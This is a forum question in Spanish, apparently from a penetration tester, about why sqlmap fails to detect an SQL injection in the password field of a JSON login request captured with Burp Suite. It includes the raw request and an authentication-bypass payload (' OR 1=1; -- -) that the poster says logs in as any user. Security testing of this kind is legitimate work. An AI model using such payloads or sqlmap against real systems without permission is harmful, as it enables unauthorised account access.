Hola, estoy tratando de hacer una inyección SQL en un formulario de inicio de sesión.
Con BurpSuite intercepto la solicitud:
POST /xxxx/web/Login HTTP/1.1
Host: 10.0.0.70:42020
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: application/json, text/plain, */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json
Referer: http://xxxxxx.com/xxxxxx/
Content-Length: 44
origin: http://xxxxx.com
Connection: close
{"username":"user","password":"pass"}
utilizando:
sqlmap -u requestFile
(donde requestFile es el contenido de la solicitud interceptada con Burp)
sqlmap no puede encontrar el campo inyectable que es la contraseña.
Estoy seguro de que es causa inyectable si como contraseña ingrese:
' OR 1=1; -- -
Puedo iniciar sesión con cada nombre de usuario que inserto
Probado también con:
{"username":*,"password":*}
pero no hay suerte.
¿Qué estoy haciendo mal?
P.S.
En cada solicitud POST o PUT realizada con el navegador, se realiza una solicitud de verificación previa con el método OPCIONES. Está hecho para evitar los problemas de CORS. ¿Podría afectar la solicitud hecha por sqlmap?